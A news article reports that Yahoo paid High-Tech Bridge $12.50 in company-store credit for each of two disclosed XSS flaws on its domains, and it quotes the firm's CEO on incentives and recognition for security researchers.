A Swiss penetration testing firm that pointed out cross-site scripting (XSS) flaws affecting two Yahoo domains was disappointed to discover the company's reward for their research.
According to High-Tech Bridge, Yahoo shelled out $12.50 each for two bugs it reported to the firm, which previously found XSS bugs in NASDAQ's website. Furthermore, the money was only redeemable if used at Yahoo's company store, High-Tech Bridge revealed in a Monday blog post.
The XSS flaws, which affected the ecom.yahoo.com and adserver.yahoo.com domains, could allow any "@Yahoo.com" email account to be compromised if a logged-in user clicked a malicious link sent by a saboteur, the company revealed.
SCMagazine.com reached out to Yahoo, but did not immediately hear back.
Three XSS bugs were reported to Yahoo as of Sept. 23, and the company responded within 48 hours, offering $12.50 each for just two of the bugs. All of the vulnerabilities have since been patched by Yahoo, High-Tech Bridge said.
The company discovered the XSS flaw after beginning an experiment to see “how quickly security vulnerabilities on well-known websites such as Yahoo can be found” – and how long it would take to receive a response, the company blog post said.
In a Tuesday email, IIia Kolochenko, CEO at High-Tech Bridge, told SCMagazine.com that even without sufficient financial motivation, companies could do a better job of providing other incentives for security researchers reporting their discoveries.
"Few companies today pay enough money to security researchers to motivate them only by money," Kolochenko wrote. "Even the amounts paid by Google are not high enough to be a sole motivation for researchers. However, when a company also offers a public 'thank you,' such as listing in [a] hall of fame, it can be a good added-value for many security professionals."
Kolochenko told SCMagazine.com that he inquired about a program that recognized researchers' findings. Yahoo's security team emailed him back saying they did not have a hall of fame program, but that things could change in the future.